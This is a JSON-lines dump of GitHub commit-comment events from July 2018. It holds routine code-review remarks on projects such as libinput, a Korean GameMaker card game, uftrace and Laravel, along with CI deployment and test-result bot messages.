{"id":"7992872689","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773871,"position":14,"line":1474,"path":"src/evdev-mt-touchpad.c","commit_id":"d32c9fe6436e35b5312dd584be138f143f31069f","created_at":"2018-07-20T04:25:09Z","updated_at":"2018-07-20T04:25:09Z","author_association":"NONE","body":"I think \"bottom-most\" is the correct nomenclature here"}},"created_at":"2018-07-20T04:25:09Z"}
{"id":"7992874537","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773874,"position":62,"line":1502,"path":"src/evdev-mt-touchpad.c","commit_id":"d32c9fe6436e35b5312dd584be138f143f31069f","created_at":"2018-07-20T04:26:00Z","updated_at":"2018-07-20T04:26:00Z","author_association":"NONE","body":"`abs()` is missing"}},"created_at":"2018-07-20T04:26:00Z"}
{"id":"7992877682","type":"CommitCommentEvent","actor":{"login":"joeyhuab"},"repo":{"name":"Magisk-Modules-Repo/Xiaomi-Mi-A1-Stock-Camera"},"payload":{"comment":{"id":29773875,"position":null,"line":null,"path":null,"commit_id":"a638ea6ad1ab546d6dc87f2c5e9a802a5d522ef3","created_at":"2018-07-20T04:27:22Z","updated_at":"2018-07-20T04:27:22Z","author_association":"COLLABORATOR","body":"Sent you an email. Thanks!"}},"created_at":"2018-07-20T04:27:22Z"}
{"id":"7992878431","type":"CommitCommentEvent","actor":{"login":"thomaslima"},"repo":{"name":"klayoutmatthias/klayout"},"payload":{"comment":{"id":29773876,"position":null,"line":null,"path":null,"commit_id":"5fe0aca9c79ac59725099d516792d4d46d95700f","created_at":"2018-07-20T04:27:40Z","updated_at":"2018-07-20T04:27:40Z","author_association":"CONTRIBUTOR","body":"Thank you for this! I am glad I waited for you to take a look at this. Once again when I look at the commit changes I realize how clueless I was in figuring out where the segfault came from."}},"created_at":"2018-07-20T04:27:40Z"}
{"id":"7992878977","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29773877,"position":7,"line":7,"path":"scripts/basicValidate.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T04:27:56Z","updated_at":"2018-07-20T04:27:56Z","author_association":"NONE","body":"변수명을 `pow` 대신에 `spellType` 같은걸로 하면 어떨까 싶음"}},"created_at":"2018-07-20T04:27:56Z"}
{"id":"7992879878","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29773878,"position":7,"line":7,"path":"scripts/basicValidate.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T04:28:20Z","updated_at":"2018-07-20T04:28:20Z","author_association":"NONE","body":"추가로 주석으로 one-hot encoded라고 달아두는게 나을듯"}},"created_at":"2018-07-20T04:28:20Z"}
{"id":"7992881370","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773879,"position":121,"line":1630,"path":"src/evdev-mt-touchpad.c","commit_id":"d32c9fe6436e35b5312dd584be138f143f31069f","created_at":"2018-07-20T04:28:58Z","updated_at":"2018-07-20T04:28:58Z","author_association":"NONE","body":"I think this may show up an issue. If I use a finger to move the pointer around, then I add another finger, marking that first finger as thumb and thus removing the pointer control from this finger (forever)  - is that a good solution?\r\n\r\ndoubly so because I don't know (without looking much deeper) how this interacts with palm detection. What happens when the second finger is now labelled as palm? Think using the right hand to use the touchpad, typing something with your left hand and accidentally touching the touchpad. This would label the initial finger as thumb and leave us without pointer control."}},"created_at":"2018-07-20T04:28:58Z"}
{"id":"7992882565","type":"CommitCommentEvent","actor":{"login":"philmareu"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29773883,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-20T04:29:32Z","updated_at":"2018-07-20T04:29:32Z","author_association":"NONE","body":"I also am having an issue with this change. I'm passing in an array as I always have been and now it is throwing the error as mentioned before. It is adding my array inside another array. So it is now iterating through and trying to preg_quote an array."}},"created_at":"2018-07-20T04:29:32Z"}
{"id":"7992885089","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773892,"position":null,"line":null,"path":null,"commit_id":"b3cbc1cac89bc5b53d5099ff7eb74bdf317e44eb","created_at":"2018-07-20T04:30:39Z","updated_at":"2018-07-20T04:30:39Z","author_association":"NONE","body":"arguably not needed. the structs don't take space, they're more for namespacing."}},"created_at":"2018-07-20T04:30:39Z"}
{"id":"7992887714","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29773896,"position":173,"line":109,"path":"scripts/build_dungeonDeck.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T04:31:54Z","updated_at":"2018-07-20T04:31:54Z","author_association":"NONE","body":"0은 왜 건너뛰는 것?\r\n1로 시작할거면\r\n```js\r\ni <= ds_grid_width(StarterDeck);\r\n```\r\n해야지 전체 이터레이션 되는게 아닌가?"}},"created_at":"2018-07-20T04:31:54Z"}
{"id":"7992890331","type":"CommitCommentEvent","actor":{"login":"trvsysadmin"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29773898,"position":null,"line":null,"path":null,"commit_id":"69125ccb5604830f6b11996ff3f6dddbe6fe0260","created_at":"2018-07-20T04:33:05Z","updated_at":"2018-07-20T04:33:05Z","author_association":"NONE","body":"Am I supposed to request to v1 branch or master branch?"}},"created_at":"2018-07-20T04:33:05Z"}
{"id":"7992891332","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29773901,"position":7,"line":7,"path":"scripts/canAttack.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T04:33:35Z","updated_at":"2018-07-20T04:33:35Z","author_association":"NONE","body":"이런식으로 변수로 사용할 용도면 String을 사용하는 것은 항상 옳지 못한 선택이 됨\r\n가령 오타 하나만 나더라도 코드 전체가 망가질 가능성이 크니까\r\n\r\n하던대로 Const를 정의하던가(GM에서 아마 Const정의시 String value를 대입할 수 있었던 것으로 기억함)\r\nEnum을 사용하는 것이 더 나아보임"}},"created_at":"2018-07-20T04:33:35Z"}
{"id":"7992906891","type":"CommitCommentEvent","actor":{"login":"MRprusa3d"},"repo":{"name":"MRprusa3d/Prusa-Firmware"},"payload":{"comment":{"id":29773929,"position":null,"line":null,"path":null,"commit_id":"bbec1ccfd41034fa0423cf2c009b5117fce3744b","created_at":"2018-07-20T04:40:35Z","updated_at":"2018-07-20T04:40:35Z","author_association":"OWNER","body":"SoundControl"}},"created_at":"2018-07-20T04:40:35Z"}
{"id":"7992910069","type":"CommitCommentEvent","actor":{"login":"KyleAMathews"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29773935,"position":null,"line":null,"path":null,"commit_id":"69125ccb5604830f6b11996ff3f6dddbe6fe0260","created_at":"2018-07-20T04:42:03Z","updated_at":"2018-07-20T04:42:03Z","author_association":"CONTRIBUTOR","body":"Both branches got the bad update :-\\"}},"created_at":"2018-07-20T04:42:03Z"}
{"id":"7992916425","type":"CommitCommentEvent","actor":{"login":"milim2"},"repo":{"name":"milim2/JSP_JDBC"},"payload":{"comment":{"id":29773949,"position":null,"line":null,"path":null,"commit_id":"05d391640daadf18d0ae608dd4c7fd552124c351","created_at":"2018-07-20T04:44:59Z","updated_at":"2018-07-20T04:44:59Z","author_association":"OWNER","body":"![picture1](https://user-images.githubusercontent.com/37784073/42983704-1de2c45a-8bb6-11e8-9451-d10b3932ec01.png)\r\n"}},"created_at":"2018-07-20T04:44:59Z"}
{"id":"7992919433","type":"CommitCommentEvent","actor":{"login":"milim2"},"repo":{"name":"milim2/JSP_JDBC"},"payload":{"comment":{"id":29773960,"position":1,"line":1,"path":"README.md","commit_id":"05d391640daadf18d0ae608dd4c7fd552124c351","created_at":"2018-07-20T04:46:22Z","updated_at":"2018-07-20T04:46:22Z","author_association":"OWNER","body":"![picture1](https://user-images.githubusercontent.com/37784073/42983731-4c115c10-8bb6-11e8-856d-cd58b5ae7caf.png)\r\n"}},"created_at":"2018-07-20T04:46:22Z"}
{"id":"7992922378","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773965,"position":null,"line":null,"path":null,"commit_id":"5e506bc7eca328597a53b6b7da8e82b74a8a9dc6","created_at":"2018-07-20T04:47:40Z","updated_at":"2018-07-20T04:47:40Z","author_association":"OWNER","body":"Ah, I missed that this commit was on this branch due to lack of rebasing. I will be more diligent in the future. This is my own custom preference, though it may possibly benefit others if it doesn't break more common functionality. It's consistent with macOS and I prefer it because I often:\r\n\r\n1) Use 3-finger gestures to switch workspaces, then begin dragging an icon from the desktop, and while holding the icon, 3-finger swipe back to a previous workspace to drop the icon onto Thunderbird; or\r\n2) Begin selecting some text (e.g. on a website) and need to 2-finger scroll down to get to the bottom of the desired range while still holding the button."}},"created_at":"2018-07-20T04:47:40Z"}
{"id":"7992926144","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773974,"position":14,"line":1474,"path":"src/evdev-mt-touchpad.c","commit_id":"d32c9fe6436e35b5312dd584be138f143f31069f","created_at":"2018-07-20T04:49:34Z","updated_at":"2018-07-20T04:49:34Z","author_association":"OWNER","body":"Thanks, that sounds good"}},"created_at":"2018-07-20T04:49:34Z"}
{"id":"7992926164","type":"CommitCommentEvent","actor":{"login":"honggyukim"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29773975,"position":6,"line":48,"path":"doc/uftrace-live.md","commit_id":"3c38ba01ffa11bd43398dcd8193bbe1340cc87ba","created_at":"2018-07-20T04:49:34Z","updated_at":"2018-07-20T04:49:34Z","author_association":"COLLABORATOR","body":"\"This is\" -> \"These are\""}},"created_at":"2018-07-20T04:49:34Z"}
{"id":"7992926229","type":"CommitCommentEvent","actor":{"login":"honggyukim"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29773977,"position":7,"line":49,"path":"doc/uftrace-live.md","commit_id":"3c38ba01ffa11bd43398dcd8193bbe1340cc87ba","created_at":"2018-07-20T04:49:36Z","updated_at":"2018-07-20T04:49:36Z","author_association":"COLLABORATOR","body":"\"if debug info is available includes functions\" -> \"if debug info is available **it** includes functions\""}},"created_at":"2018-07-20T04:49:36Z"}
{"id":"7992926294","type":"CommitCommentEvent","actor":{"login":"honggyukim"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29773978,"position":8,"line":50,"path":"doc/uftrace-live.md","commit_id":"3c38ba01ffa11bd43398dcd8193bbe1340cc87ba","created_at":"2018-07-20T04:49:38Z","updated_at":"2018-07-20T04:49:38Z","author_association":"COLLABORATOR","body":"I think this line is not needed any more."}},"created_at":"2018-07-20T04:49:38Z"}
{"id":"7992926430","type":"CommitCommentEvent","actor":{"login":"honggyukim"},"repo":{"name":"namhyung/uftrace"},"payload":{"comment":{"id":29773979,"position":8,"line":85,"path":"doc/uftrace-record.md","commit_id":"3c38ba01ffa11bd43398dcd8193bbe1340cc87ba","created_at":"2018-07-20T04:49:42Z","updated_at":"2018-07-20T04:49:42Z","author_association":"COLLABORATOR","body":"Ditto."}},"created_at":"2018-07-20T04:49:42Z"}
{"id":"7992928059","type":"CommitCommentEvent","actor":{"login":"unascribed"},"repo":{"name":"elytra/InfraRedstone"},"payload":{"comment":{"id":29773981,"position":null,"line":null,"path":null,"commit_id":"c28d1570547e27934208be46b3e65f6436b5f1ee","created_at":"2018-07-20T04:50:27Z","updated_at":"2018-07-20T04:50:27Z","author_association":"MEMBER","body":"Skeleton provides a LICENSE file because Skeleton itself has a license, and a lot of Elytra projects are MIT anyway, so having the text preloaded into Skeleton is convenient.\r\n\r\nThis is why the Skeleton readme says to check the license when you use it."}},"created_at":"2018-07-20T04:50:27Z"}
{"id":"7992929096","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29773985,"position":null,"line":null,"path":null,"commit_id":"c11fb9f7c645894e73f39e77d46f38fa0214cbf2","created_at":"2018-07-20T04:50:59Z","updated_at":"2018-07-20T04:50:59Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180720-045058 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180720-045058\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-20T04:50:59Z"}
{"id":"7992933206","type":"CommitCommentEvent","actor":{"login":"lch794613"},"repo":{"name":"huizzz/lchmysqldemo"},"payload":{"comment":{"id":29773988,"position":null,"line":null,"path":null,"commit_id":"d36c4affd078e9be9cd97c775fb95f00c8d85fda","created_at":"2018-07-20T04:52:56Z","updated_at":"2018-07-20T04:52:56Z","author_association":"CONTRIBUTOR","body":"mysqldemo"}},"created_at":"2018-07-20T04:52:56Z"}
{"id":"7992934125","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29773989,"position":4,"line":4,"path":"scripts/skell_pressed.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T04:53:23Z","updated_at":"2018-07-20T04:53:23Z","author_association":"NONE","body":"case가 하나일 경우 switch-case를 쓰기보다는 if를 사용하는게 더 낫지 않을까..?"}},"created_at":"2018-07-20T04:53:23Z"}
{"id":"7992937538","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29773993,"position":62,"line":1502,"path":"src/evdev-mt-touchpad.c","commit_id":"d32c9fe6436e35b5312dd584be138f143f31069f","created_at":"2018-07-20T04:54:59Z","updated_at":"2018-07-20T04:54:59Z","author_association":"OWNER","body":"In this case we know that first.y must be >= second.y, so I left out abs() - maybe for performance, maybe for superstition :-) For the X coord, it's unused in this function as of yet; I tried a couple things like making sure first.x was < (second.x + 10mm), considering handedness, but didn't see a benefit during testing and simplified instead. Of course I will defer to your expertise if there's a reason to use abs() that I wasn't aware of."}},"created_at":"2018-07-20T04:54:59Z"}
{"id":"7992941270","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29774001,"position":null,"line":null,"path":null,"commit_id":"5e506bc7eca328597a53b6b7da8e82b74a8a9dc6","created_at":"2018-07-20T04:56:41Z","updated_at":"2018-07-20T04:56:41Z","author_association":"NONE","body":"right, so we can add this but there is a caveat: this needs a lot of tests to make sure nothing breaks unexpectedly."}},"created_at":"2018-07-20T04:56:41Z"}
{"id":"7992941333","type":"CommitCommentEvent","actor":{"login":"xixixijie"},"repo":{"name":"xixixijie/SSM"},"payload":{"comment":{"id":29774002,"position":null,"line":null,"path":null,"commit_id":"450163cffda597098e1518e3890c8a90be21d75b","created_at":"2018-07-20T04:56:43Z","updated_at":"2018-07-20T04:56:43Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-20T04:56:43Z"}
{"id":"7992941686","type":"CommitCommentEvent","actor":{"login":"xixixijie"},"repo":{"name":"xixixijie/SSM"},"payload":{"comment":{"id":29774003,"position":null,"line":null,"path":null,"commit_id":"450163cffda597098e1518e3890c8a90be21d75b","created_at":"2018-07-20T04:56:52Z","updated_at":"2018-07-20T04:56:52Z","author_association":"OWNER","body":"321"}},"created_at":"2018-07-20T04:56:52Z"}
{"id":"7992942201","type":"CommitCommentEvent","actor":{"login":"xixixijie"},"repo":{"name":"xixixijie/SSM"},"payload":{"comment":{"id":29774004,"position":null,"line":null,"path":null,"commit_id":"450163cffda597098e1518e3890c8a90be21d75b","created_at":"2018-07-20T04:57:04Z","updated_at":"2018-07-20T04:57:04Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-20T04:57:04Z"}
{"id":"7992950136","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29774030,"position":null,"line":null,"path":null,"commit_id":"c2531bea7dfff51a0ba126a0110d734822a73876","created_at":"2018-07-20T05:00:41Z","updated_at":"2018-07-20T05:00:41Z","author_association":"OWNER","body":"Shit."}},"created_at":"2018-07-20T05:00:41Z"}
{"id":"7992950546","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29774031,"position":null,"line":null,"path":null,"commit_id":"88e64ceee9410ee589d808c5e9923e7ec33a48de","created_at":"2018-07-20T05:00:52Z","updated_at":"2018-07-20T05:00:52Z","author_association":"OWNER","body":"@sirTribble \r\nguid is only used if Ovale didn't refresh itself for more than maxFrameRefresh ( default 250ms ) and  Ovale Icon must be visible for that\r\nIf icon is visible Ovale will refresh on:\r\n- aura gain/loss\r\n- energy/mana/rage regen\r\n- spell cast \r\n- any stat changes (agi/str/int/haste/mastery etc.)\r\n- target swaps \r\nso that second part isn't really needed in combat\r\n\r\nactually I wanted to remove guid check but I don't have time at the moment to test it ( I'm trying to update spell definitions)\r\n\r\ncould you give me example in which situation you need to enforce max refresh ?"}},"created_at":"2018-07-20T05:00:52Z"}
{"id":"7992953328","type":"CommitCommentEvent","actor":{"login":"ingesolvoll"},"repo":{"name":"ingesolvoll/kee-frame"},"payload":{"comment":{"id":29774034,"position":null,"line":null,"path":null,"commit_id":"86c14fb5545baa9e878a41f0426ae7e84b088768","created_at":"2018-07-20T05:02:04Z","updated_at":"2018-07-20T05:02:04Z","author_association":"OWNER","body":"Had to revert this, as it messed up the order of things"}},"created_at":"2018-07-20T05:02:04Z"}
{"id":"7992956674","type":"CommitCommentEvent","actor":{"login":"jasonhaxstuff"},"repo":{"name":"Nightwatch/db"},"payload":{"comment":{"id":29774047,"position":null,"line":null,"path":null,"commit_id":"c90f337c122836dec315aef10ba297ee82b1f3fc","created_at":"2018-07-20T05:03:33Z","updated_at":"2018-07-20T05:03:33Z","author_association":"MEMBER","body":"and we never knew"}},"created_at":"2018-07-20T05:03:33Z"}
{"id":"7992957583","type":"CommitCommentEvent","actor":{"login":"codenameone"},"repo":{"name":"codenameone/CodenameOne"},"payload":{"comment":{"id":29774051,"position":null,"line":null,"path":null,"commit_id":"86fea99196dd5a453988ede8217e0809e529469a","created_at":"2018-07-20T05:03:56Z","updated_at":"2018-07-20T05:03:56Z","author_association":"OWNER","body":"That would be harder as it would require a semantic change to indicate that and would change the purpose of this UI. Maybe you shouldn't use this feature and instead just set the title component to text area like we do in the `Toolbar` javadoc?"}},"created_at":"2018-07-20T05:03:56Z"}
{"id":"7992961654","type":"CommitCommentEvent","actor":{"login":"Boundarybreaker"},"repo":{"name":"elytra/InfraRedstone"},"payload":{"comment":{"id":29774058,"position":null,"line":null,"path":null,"commit_id":"c28d1570547e27934208be46b3e65f6436b5f1ee","created_at":"2018-07-20T05:05:39Z","updated_at":"2018-07-20T05:05:39Z","author_association":"MEMBER","body":"well I thought I'd deleted that LICENSE file when I'd put the COPYING.gpl in is the main thing"}},"created_at":"2018-07-20T05:05:39Z"}
{"id":"7992962284","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29774060,"position":null,"line":null,"path":null,"commit_id":"a75e63d07ffd5bce28a09d43c1e35ce09f766b2a","created_at":"2018-07-20T05:05:56Z","updated_at":"2018-07-20T05:05:56Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-104](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-104).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-104-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-20T05:05:56Z"}
{"id":"7992966769","type":"CommitCommentEvent","actor":{"login":"nex3"},"repo":{"name":"sass/ruby-sass"},"payload":{"comment":{"id":29774070,"position":null,"line":null,"path":null,"commit_id":"8b77fc88f8bdbc21b44d0a5be7833d91a5edb04c","created_at":"2018-07-20T05:07:55Z","updated_at":"2018-07-20T05:07:55Z","author_association":"CONTRIBUTOR","body":"The Rakefile does it automatically, so I figured it was easier to check in than to reset after each release."}},"created_at":"2018-07-20T05:07:55Z"}
{"id":"7992970847","type":"CommitCommentEvent","actor":{"login":"DaemonSultan"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774078,"position":4,"line":4,"path":"scripts/skell_pressed.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T05:09:49Z","updated_at":"2018-07-20T05:09:49Z","author_association":"OWNER","body":"case가 늘어날 경우를 대비해서 해놓은 건데 그럴 일 없을 듯\r\n(정확히 말하면 다른 케이스는 페런츠에서 처리함)"}},"created_at":"2018-07-20T05:09:49Z"}
{"id":"7992971577","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-cloud"},"payload":{"comment":{"id":29774081,"position":null,"line":null,"path":null,"commit_id":"c041981e218aea5ddacc139c90ef63988881af3f","created_at":"2018-07-20T05:10:10Z","updated_at":"2018-07-20T05:10:10Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-20T05:10:10Z"}
{"id":"7992973073","type":"CommitCommentEvent","actor":{"login":"DaemonSultan"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774084,"position":7,"line":7,"path":"scripts/canAttack.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T05:10:50Z","updated_at":"2018-07-20T05:10:50Z","author_association":"OWNER","body":"반영하겠음"}},"created_at":"2018-07-20T05:10:50Z"}
{"id":"7992974289","type":"CommitCommentEvent","actor":{"login":"Pocable"},"repo":{"name":"Pocable/AssemblyDocumentationFormater"},"payload":{"comment":{"id":29774085,"position":null,"line":null,"path":null,"commit_id":"7c6d1c784f902de745145543beb0e181d9f22138","created_at":"2018-07-20T05:11:23Z","updated_at":"2018-07-20T05:11:23Z","author_association":"OWNER","body":"*added"}},"created_at":"2018-07-20T05:11:23Z"}
{"id":"7992977459","type":"CommitCommentEvent","actor":{"login":"DaemonSultan"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774092,"position":173,"line":109,"path":"scripts/build_dungeonDeck.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T05:12:51Z","updated_at":"2018-07-20T05:12:51Z","author_association":"OWNER","body":"첫 줄이 데이터 이름임 (INDEX, VALUE 등...) 그래서 1부터 시작.\r\ni <= ds_grid_width(StarterDeck);이었는데 맨 끝에 undefined가 붙어서 에러가 떠서 그렇게 바꾼건데 확실히 뭐가 잘못된 듯"}},"created_at":"2018-07-20T05:12:51Z"}
{"id":"7992978063","type":"CommitCommentEvent","actor":{"login":"sai789"},"repo":{"name":"bahmni-msf/bahmni-mart"},"payload":{"comment":{"id":29774094,"position":22,"line":73,"path":"src/test/java/org/bahmni/mart/exports/updatestrategy/ObsIncrementalUpdateStrategyTest.java","commit_id":"93683aaaa0ba6c6cf17850ca19aa16dcad8b553f","created_at":"2018-07-20T05:13:06Z","updated_at":"2018-07-20T05:13:06Z","author_association":"NONE","body":"I just did refactoring for that variable. I extracted string literals \"20\", from all verifications into a class variable"}},"created_at":"2018-07-20T05:13:06Z"}
{"id":"7992978179","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29774095,"position":121,"line":1630,"path":"src/evdev-mt-touchpad.c","commit_id":"d32c9fe6436e35b5312dd584be138f143f31069f","created_at":"2018-07-20T05:13:09Z","updated_at":"2018-07-20T05:13:09Z","author_association":"OWNER","body":"Yes, this may be a too-simplistic solution to a complicated problem. For my personal use, this thumb detection approach makes me much happier - the edge cases in the previous thumb detection led to pain points like misinterpreting a clicking thumb being a finger, which prevented me from dragging properly; or unintended two-finger scrolling when I was resting my thumb on the touchpad. On the other hand, I haven't yet encountered drawbacks to the two situations you describe.\r\n\r\nOf course I'm only one person, and who knows how many millions of people will end up using the libinput driver. This is where I hope there is some objective data about how common some of these edge cases are to people in general, to help inform decisions about what is worth prioritizing.\r\n\r\nPersonally, I use this thumb detection approach on my laptop because for me, the potential issues with this  approach are a better tradeoff in my opinion than the issues I've experienced with other approaches. It works closer to how I'm used to from OSX; but of course I don't claim to know what is best for the majority of people, and I don't have the perspective to know how appropriate it is for all the different hardware and people out there.\r\n\r\nThank you again for the discussion and serious consideration. I'm very happy just to have the conversation, and for opportunity to contribute any way I can."}},"created_at":"2018-07-20T05:13:09Z"}
{"id":"7992978955","type":"CommitCommentEvent","actor":{"login":"DaemonSultan"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774099,"position":7,"line":7,"path":"scripts/basicValidate.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T05:13:29Z","updated_at":"2018-07-20T05:13:29Z","author_association":"OWNER","body":"반영하겠음"}},"created_at":"2018-07-20T05:13:29Z"}
{"id":"7992981004","type":"CommitCommentEvent","actor":{"login":"DaemonSultan"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774106,"position":33,"line":18,"path":"scripts/affordable.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T05:14:22Z","updated_at":"2018-07-20T05:14:22Z","author_association":"OWNER","body":"you 이외에는 이걸 쓸만한 인스턴스가 없는데 그렇게 하는 이유가?"}},"created_at":"2018-07-20T05:14:22Z"}
{"id":"7992981040","type":"CommitCommentEvent","actor":{"login":"ZXianShen"},"repo":{"name":"ZXianShen/Hello-world"},"payload":{"comment":{"id":29774107,"position":4,"line":3,"path":"README.md","commit_id":"0081139233f46daacf2fc29e3c871a904dfab674","created_at":"2018-07-20T05:14:22Z","updated_at":"2018-07-20T05:14:22Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-20T05:14:22Z"}
{"id":"7992981714","type":"CommitCommentEvent","actor":{"login":"gaobabawudi"},"repo":{"name":"gaobabawudi/gaobabawudi.io"},"payload":{"comment":{"id":29774108,"position":null,"line":null,"path":null,"commit_id":"0e9c625be40bf7cf63fa26aee3083c5406987b8a","created_at":"2018-07-20T05:14:41Z","updated_at":"2018-07-20T05:14:41Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-20T05:14:41Z"}
{"id":"7992981916","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29774109,"position":null,"line":null,"path":null,"commit_id":"2775b15e40796870779ff44f1d74e2c56eb2104c","created_at":"2018-07-20T05:14:46Z","updated_at":"2018-07-20T05:14:46Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2327 of 2328 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-20T05:14:46Z"}
{"id":"7992982222","type":"CommitCommentEvent","actor":{"login":"DaemonSultan"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774111,"position":22,"line":8,"path":"scripts/affordable.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T05:14:55Z","updated_at":"2018-07-20T05:14:55Z","author_association":"OWNER","body":"에러 메시지를 출력하기 용이하게 하려고 그런 것인데 별론가?"}},"created_at":"2018-07-20T05:14:55Z"}
